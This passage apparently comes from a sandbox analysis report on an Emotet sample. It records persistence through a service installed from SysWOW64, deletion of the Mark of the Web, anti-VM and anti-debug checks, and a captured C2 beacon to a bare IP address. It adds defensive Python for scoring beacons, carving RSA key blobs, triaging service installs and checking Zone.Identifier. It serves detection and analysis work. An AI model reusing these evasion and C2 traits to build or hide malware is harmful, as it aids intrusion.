8c 6e 33 f3 e4 0e 60 c1 63 0e 7a 7b 6f 50 ab 44 30 93 04 9f e4 a9 3a 73 17 af 84 fb 97 c1 dd 90 81 87 1b d4 f8 ce e1 a3 09 5c f0 44 44 8f 9c 35 7c bc 2a c5 93 40 4e 97 a2 d9 5b ed bd de 1b 90 8c 2a 61 27 49 13 6f 1a d4 55 91 07 0b ff b1 62 6e ec f2 b1 b2 df 1a d2 2d c8 Data Ascii: .0 c\xPV[^iYlFY816*A|HLKG?.+N43U0PWWwXk =tt'~c<7bjhlp.1$'<`gRW#!CK+RC adIQy7,mn+J4~-v*Xn[5yFO&?W9?Ya#JX-"wCHOBa$V*LVpDev%Rn3`cz{oPD0:s\DD5|*@N[*a'IoUbn-
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD16D8 InternetReadFile, 5_2_00CD16D8
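The POST above is plaintext HTTP carried on port 443 to a bare IP address, with a root path, a legacy Internet Explorer User-Agent and a short high-entropy body. Those traits together are what a network detection should key on rather than the IP alone, which rotates. The following is an added example (not part of the sandbox report, and not Emotet's or Joe Sandbox's code) that parses such a request and scores those indicators. The request is rebuilt from the headers shown above with CRLF line endings restored; its body is a constructed 388-byte stand-in, not the captured payload, and the benign control request is constructed too. The 7.0-bit entropy threshold and the three-indicator cutoff are assumptions.

```python
import hashlib
import ipaddress
import math
import re
from collections import Counter

# Constructed stand-in for the 388-byte body: deterministic pseudo-random
# bytes, not the captured payload.
CONSTRUCTED_BODY = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(13))[:388]

# Headers as shown in the report, with CRLF line endings restored.
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; "
    b".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    b"Host: 77.157.40.119:443\r\n"
    b"Content-Length: 388\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n" + CONSTRUCTED_BODY
)

# Constructed benign control.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\r\n"
    b"\r\n"
)

LEGACY_IE_UA = re.compile(r"Mozilla/4\.0 \(compatible; MSIE [5-9]\.\d")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the empirical byte distribution (maximum 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_request(raw: bytes):
    """Split a plaintext HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def split_host(host: str):
    """Return (name, port) from a Host header; handles [v6]:port and v4:port."""
    if host.startswith("["):
        name, _, rest = host[1:].partition("]")
        port = rest[1:] if rest.startswith(":") else ""
    else:
        name, sep, port = host.rpartition(":")
        if not sep:
            name, port = host, ""
    return name, (int(port) if port.isdigit() else None)


def is_literal_ip(name: str) -> bool:
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def score_request(raw: bytes) -> dict:
    """Indicators of an Emotet-style beacon; 'suspicious' when three or more fire."""
    method, path, headers, body = parse_request(raw)
    host, port = split_host(headers.get("host", ""))
    ind = {
        "post_to_root": method == "POST" and path == "/",
        "literal_ip_host": is_literal_ip(host),
        "plaintext_on_tls_port": port == 443,  # HTTP without TLS on the HTTPS port
        "legacy_ie_ua": bool(LEGACY_IE_UA.search(headers.get("user-agent", ""))),
        "high_entropy_body": shannon_entropy(body) > 7.0,  # encrypted or compressed blob
    }
    ind["score"] = sum(ind.values())
    ind["suspicious"] = ind["score"] >= 3
    return ind


if __name__ == "__main__":
    for name, req in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, score_request(req))
```

The body entropy only says "not text"; on a proxy that already strips TLS this is what separates a beacon from an ordinary form post with the same shape. The literal-IP and 443-without-TLS checks are the cheap ones to run first at the network edge.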

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: tcpmdmaus.exe, 00000000.00000002.372082476.000000000096A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2195 CryptImportKey,LocalFree,CryptReleaseContext, 5_2_00CD2195
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_01482195 CryptImportKey,LocalFree,CryptReleaseContext, 7_2_01482195
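CryptImportKey consumes a CryptoAPI key blob, so when a payload imports a key it carries, the blob can usually be carved from the unpacked image by its fixed header. The report does not say which blob type this sample imports; the added example below (written for this page, not taken from the report or from Emotet) assumes the common case of an RSA PUBLICKEYBLOB and implements a builder, a parser and a carver for that layout (BLOBHEADER, then RSAPUBKEY with the "RSA1" magic, then a little-endian modulus). The 512-bit key and the surrounding bytes are constructed test data, not a real key. A PLAINTEXTKEYBLOB (bType 0x08) or SIMPLEBLOB (0x01) would not match this carver.

```python
import struct

# CryptoAPI blob constants from wincrypt.h.
PUBLICKEYBLOB = 0x06
CUR_BLOB_VERSION = 0x02
CALG_RSA_KEYX = 0x0000A400  # key-exchange (encryption) key
CALG_RSA_SIGN = 0x00002400  # signature key
RSA1_MAGIC = 0x31415352     # b"RSA1" read little-endian
HEADER_LEN = 8 + 12         # BLOBHEADER + RSAPUBKEY

# Constructed toy key: a 512-bit odd integer, NOT a real RSA modulus.
TOY_MODULUS = (1 << 511) | 0x1234567
TOY_EXPONENT = 65537


def build_rsa_publickeyblob(modulus, exponent, bitlen, alg=CALG_RSA_KEYX):
    """BLOBHEADER + RSAPUBKEY + little-endian modulus, the form CryptImportKey accepts."""
    if bitlen % 8 or modulus >= 1 << bitlen:
        raise ValueError("modulus does not fit bitlen")
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, alg)
    rsapubkey = struct.pack("<III", RSA1_MAGIC, bitlen, exponent)
    return header + rsapubkey + modulus.to_bytes(bitlen // 8, "little")


def parse_rsa_publickeyblob(blob):
    """Parse a blob starting at blob[0]; raise ValueError if it is not an RSA PUBLICKEYBLOB."""
    if len(blob) < HEADER_LEN:
        raise ValueError("short blob")
    btype, version, reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<III", blob, 8)
    if (btype, version, reserved) != (PUBLICKEYBLOB, CUR_BLOB_VERSION, 0):
        raise ValueError("not a PUBLICKEYBLOB")
    if alg not in (CALG_RSA_KEYX, CALG_RSA_SIGN) or magic != RSA1_MAGIC:
        raise ValueError("not an RSA public key")
    if bitlen % 8 or not 512 <= bitlen <= 16384:
        raise ValueError("implausible key length")
    nbytes = bitlen // 8
    if len(blob) < HEADER_LEN + nbytes:
        raise ValueError("truncated modulus")
    return {
        "alg": "RSA_KEYX" if alg == CALG_RSA_KEYX else "RSA_SIGN",
        "bits": bitlen,
        "exponent": pubexp,
        "modulus": int.from_bytes(blob[HEADER_LEN:HEADER_LEN + nbytes], "little"),
        "size": HEADER_LEN + nbytes,
    }


def carve_rsa_publickeyblobs(image):
    """Return [(offset, parsed)] for every valid RSA PUBLICKEYBLOB in a memory or unpacked image."""
    found = []
    pos = image.find(b"RSA1")
    while pos != -1:
        start = pos - 8  # the RSAPUBKEY magic sits 8 bytes after the BLOBHEADER start
        if start >= 0:
            try:
                found.append((start, parse_rsa_publickeyblob(image[start:])))
            except ValueError:
                pass  # bare "RSA1" string or a malformed header: skip
        pos = image.find(b"RSA1", pos + 1)
    return found


# Constructed "unpacked image": padding, the blob, then a bare "RSA1" decoy.
CONSTRUCTED_IMAGE = (
    b"\x90" * 37
    + build_rsa_publickeyblob(TOY_MODULUS, TOY_EXPONENT, 512)
    + b"\x00" * 20 + b"RSA1" + b"\xcc" * 40
)

if __name__ == "__main__":
    for off, key in carve_rsa_publickeyblobs(CONSTRUCTED_IMAGE):
        print(f"{off:#x}: {key['alg']} {key['bits']}-bit e={key['exponent']}")
```

Run it over an .unpack image such as the 5.2.tcpmdmaus.exe.cd0000.2.unpack listed above; a hit gives the modulus and exponent the sample hands to CryptImportKey, which is the material needed to recognise the same key in other samples. PRIVATEKEYBLOB (0x07) uses the same header with the magic "RSA2" and appends the CRT components after the modulus, so a private-key carver is the same code with a longer tail.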

System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE Matched rule: Emotet Payload Author: kevoreilly
Source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE Matched rule: Emotet Payload Author: kevoreilly
Source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE Matched rule: Emotet Payload Author: kevoreilly
Source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE Matched rule: Emotet Payload Author: kevoreilly
Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload Author: kevoreilly
Uses 32bit PE files
Source: tcpmdmaus.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\tcpmdmaus.exe File deleted: C:\Windows\SysWOW64\sharedconnect.exe:Zone.Identifier
Creates files inside the system directory
Source: C:\Windows\SysWOW64\sharedconnect.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD1F76 CreateProcessAsUserW, 5_2_00CD1F76
Sample file is different than original file name gathered from version info
Source: tcpmdmaus.exe, 00000000.00000000.345083706.00000000003F3000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe
Source: tcpmdmaus.exe, 00000005.00000000.370086170.00000000003F3000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe
Source: tcpmdmaus.exe Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe
Contains functionality to delete services
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD80BC _snwprintf,OpenServiceW,DeleteService,CloseServiceHandle, 5_2_00CD80BC
Source: tcpmdmaus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0xfffff000 address: 0x0
Source: tcpmdmaus.exe Virustotal: Detection: 85%
Source: tcpmdmaus.exe Metadefender: Detection: 16%
Source: tcpmdmaus.exe ReversingLabs: Detection: 96%
Source: tcpmdmaus.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\tcpmdmaus.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\tcpmdmaus.exe 'C:\Users\user\Desktop\tcpmdmaus.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\tcpmdmaus.exe Process created: C:\Users\user\Desktop\tcpmdmaus.exe C:\Users\user\Desktop\tcpmdmaus.exe
Source: unknown Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe
Source: C:\Windows\SysWOW64\sharedconnect.exe Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\tcpmdmaus.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: classification engine Classification label: mal84.troj.evad.winEXE@11/4@0/9
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle, 5_2_00CD8142
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle, 7_2_01488142
Source: C:\Users\user\Desktop\tcpmdmaus.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD81DF ChangeServiceConfig2W, 5_2_00CD81DF
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_00951B40 CreateToolhelp32Snapshot, 0_2_00951B40
Source: C:\Users\user\Desktop\tcpmdmaus.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\MAF72BC4A
Source: C:\Users\user\Desktop\tcpmdmaus.exe Mutant created: \Sessions\1\BaseNamedObjects\PEMD70
Source: C:\Users\user\Desktop\tcpmdmaus.exe Mutant created: \Sessions\1\BaseNamedObjects\PEM14F8
Source: C:\Windows\SysWOW64\sharedconnect.exe Mutant created: \BaseNamedObjects\Global\IAF72BC4A
Source: C:\Users\user\Desktop\tcpmdmaus.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\IAF72BC4A
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts (reported 4 times)
Source: tcpmdmaus.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: tcpmdmaus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ewjrRWJW##@HRh.pdb source: tcpmdmaus.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_003D2E75 push ecx; ret 0_2_003D2E98
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_003D2E75 push ecx; ret 5_2_003D2E98
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 6_2_003D2E75 push ecx; ret 6_2_003D2E98
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_003D2E75 push ecx; ret 7_2_003D2E98
PE file contains sections with non-standard names
Source: tcpmdmaus.exe Static PE information: section name: .bT
Source: tcpmdmaus.exe Static PE information: section name: D
Source: tcpmdmaus.exe Static PE information: section name: .crt0
Source: tcpmdmaus.exe Static PE information: section name: cji8
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_00951966 LoadLibraryA,GetProcAddress, 0_2_00951966

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\sharedconnect.exe Executable created and started: C:\Windows\SysWOW64\sharedconnect.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\tcpmdmaus.exe PE file moved: C:\Windows\SysWOW64\sharedconnect.exe
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD81F7 StartServiceW,CloseServiceHandle,CloseServiceHandle, 5_2_00CD81F7
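Taken together, the service-related code functions in this report describe the install chain: the PE is moved to C:\Windows\SysWOW64\sharedconnect.exe, OpenSCManagerW and CreateServiceW register it, ChangeServiceConfig2W adjusts the configuration, StartServiceW starts it, and EnumServicesStatusExW, OpenServiceW and DeleteService let the sample remove a service. On a monitored host the CreateServiceW call surfaces as System log Event ID 7045 ("A service was installed in the system"). The added example below (not from the report) triages such records: it normalises ImagePath (quotes, arguments, %SystemRoot%, \??\ and \SystemRoot\ prefixes) and scores the image location against a host baseline. The records, the baseline and the service names are constructed; the report gives only the image path, and the service name is formatted at runtime by _snwprintf, so it is not known here. The weights are assumptions.

```python
import re

# Constructed records shaped like System log Event ID 7045. The second
# entry uses the image path the report shows for the dropped binary; its
# ServiceName is invented, since the report does not give it.
EVENTS_7045 = [
    {"ServiceName": "BITS", "ImagePath": "%SystemRoot%\\System32\\svchost.exe -k netsvcs -p",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "svc_constructed", "ImagePath": "\"C:\\Windows\\SysWOW64\\sharedconnect.exe\"",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "UpdaterSvc", "ImagePath": "C:\\Users\\user\\AppData\\Local\\Temp\\upd.exe /svc",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

# Constructed baseline: image names of services the host had before the incident.
BASELINE = {"svchost.exe", "spoolsv.exe", "lsass.exe", "services.exe"}

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
_EXE_PREFIX = re.compile(r"(.*?\.(?:exe|sys|dll))(?:\s|$)", re.IGNORECASE)


def normalize_image_path(image_path, system_root="C:\\Windows"):
    """Reduce a 7045 ImagePath to the bare image file: drop quotes, arguments and NT prefixes."""
    p = image_path.strip()
    p = re.sub(r"%systemroot%", lambda _m: system_root, p, flags=re.IGNORECASE)
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.lower().startswith("\\systemroot\\"):
        p = system_root + "\\" + p[len("\\SystemRoot\\"):]
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    m = _EXE_PREFIX.match(p)  # unquoted path: stop at the first .exe/.sys/.dll token
    return m.group(1) if m else p.split(" ", 1)[0]


def triage_service_install(event, baseline):
    """Score one 7045 record; the weights are assumptions to tune per estate."""
    image = normalize_image_path(event["ImagePath"])
    low = image.lower()
    basename = low.rsplit("\\", 1)[-1]
    reasons = []
    if low.startswith(USER_WRITABLE):
        reasons.append(("image in user-writable path", 2))
    if low.startswith(SYSTEM_DIRS) and basename not in baseline:
        reasons.append(("image name absent from host baseline", 2))
    if low.startswith("c:\\windows\\syswow64\\"):
        reasons.append(("32-bit image registered from SysWOW64", 1))  # weak on its own
    if event.get("StartType", "").lower().startswith("auto") and event.get("AccountName") == "LocalSystem":
        reasons.append(("auto-start as LocalSystem", 1))
    score = sum(w for _r, w in reasons)
    return {"service": event["ServiceName"], "image": image,
            "reasons": [r for r, _w in reasons], "score": score, "suspicious": score >= 2}


def triage_all(events, baseline):
    """Map ServiceName -> triage result for a batch of 7045 records."""
    return {r["service"]: r for r in (triage_service_install(e, baseline) for e in events)}


if __name__ == "__main__":
    for name, r in triage_all(EVENTS_7045, BASELINE).items():
        print(name, r["suspicious"], r["image"], r["reasons"])
```

A 32-bit image under SysWOW64 is a weak signal by itself (legitimate 32-bit services exist), which is why it carries less weight than a user-writable path or a binary the baseline never saw. In production, replace the baseline set with an Authenticode or catalog check on the normalised image path; the path normalisation is still needed first, because ImagePath is free text written by whoever called CreateServiceW.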

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\tcpmdmaus.exe File opened: C:\Windows\SysWOW64\sharedconnect.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\sharedconnect.exe Process information set: NOOPENFILEERRORBOX (reported 4 times)
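The sample opens C:\Windows\SysWOW64\sharedconnect.exe:Zone.Identifier with delete access and removes it, so the dropped binary carries no Mark of the Web and the protections keyed on it (SmartScreen, Office Protected View) do not apply. The stream is an NTFS alternate data stream holding an INI-style [ZoneTransfer] section. The added example below (not from the report) reads and parses it and lists executables in a directory that lack it. Opening <file>:Zone.Identifier with a plain open() reaches the stream on NTFS; the fixture files and their stream contents are constructed.

```python
import os

ZONE_NAMES = {0: "LocalMachine", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}
STREAM_SUFFIX = ":Zone.Identifier"


def parse_zone_identifier(text):
    """Parse the INI-style stream body; {} when there is no [ZoneTransfer] ZoneId."""
    section, values = None, {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip()] = value.strip()
    if not values.get("ZoneId", "").isdigit():
        return {}
    zone = int(values["ZoneId"])
    return {"zone_id": zone, "zone": ZONE_NAMES.get(zone, "Unknown"),
            "referrer": values.get("ReferrerUrl"), "host": values.get("HostUrl")}


def read_mark_of_the_web(path):
    """Open <file>:Zone.Identifier; on NTFS that name is the alternate data stream."""
    try:
        with open(path + STREAM_SUFFIX, "r", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:  # stream never written, or deleted as this sample does
        return {}


def write_mark_of_the_web(path, zone_id, host_url=None):
    """Write the stream the way a browser download would (used here for the fixture)."""
    body = f"[ZoneTransfer]\nZoneId={zone_id}\n"
    if host_url:
        body += f"HostUrl={host_url}\n"
    with open(path + STREAM_SUFFIX, "w", encoding="utf-8") as fh:
        fh.write(body)


def files_without_motw(directory, exts=(".exe", ".dll")):
    """Names of executables in a directory that carry no Zone.Identifier stream."""
    names = sorted(e.name for e in os.scandir(directory)
                   if e.is_file() and e.name.lower().endswith(exts))
    return [n for n in names if not read_mark_of_the_web(os.path.join(directory, n))]


def demo():
    """Constructed fixture: one marked and one unmarked executable in a temp dir."""
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        marked, dropped = os.path.join(d, "marked.exe"), os.path.join(d, "dropped.exe")
        for p in (marked, dropped):
            open(p, "wb").close()
        write_mark_of_the_web(marked, 3, "https://example.invalid/marked.exe")
        return {"marked": read_mark_of_the_web(marked),
                "dropped": read_mark_of_the_web(dropped),
                "unmarked": files_without_motw(d)}


if __name__ == "__main__":
    print(demo())
```

On a filesystem without alternate data streams the same name is just a sibling file, which is what the constructed fixture relies on; on NTFS it is the real stream. A binary that a user-launched process placed in a system directory and that has no stream is exactly the case this report records, and the absence is the thing to check rather than the ZoneId value.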

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 5704 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6920 Thread sleep time: -30000s >= -30000s
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW, 5_2_00CD7F4D
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: EnumServicesStatusExW,GetLastError, 5_2_00CD7EF4
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW, 7_2_01487F4D
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: EnumServicesStatusExW,GetLastError, 7_2_01487EF4
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\tcpmdmaus.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\sharedconnect.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\tcpmdmaus.exe File Volume queried: C:\ FullSizeInformation
Source: svchost.exe, 00000013.00000002.743677693.000001FADEA62000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000000E.00000002.477596789.0000012F642E7000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.742209194.000001FAD922A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_00951966 LoadLibraryA,GetProcAddress, 0_2_00951966
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_009518C0 GetProcessHeap,RtlFreeHeap, 0_2_009518C0
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_00952010 mov eax, dword ptr fs:[00000030h] 0_2_00952010
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_009515E0 mov eax, dword ptr fs:[00000030h] 0_2_009515E0
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2010 mov eax, dword ptr fs:[00000030h] 5_2_00CD2010
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD15E0 mov eax, dword ptr fs:[00000030h] 5_2_00CD15E0
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_014815E0 mov eax, dword ptr fs:[00000030h] 7_2_014815E0
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_01482010 mov eax, dword ptr fs:[00000030h] 7_2_01482010

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\tcpmdmaus.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\sharedconnect.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (reported 3 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (reported 4 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (reported 3 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation (reported 2 times)
Source: C:\Windows\SysWOW64\sharedconnect.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_0095261F RtlGetVersion,GetNativeSystemInfo, 0_2_0095261F

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY
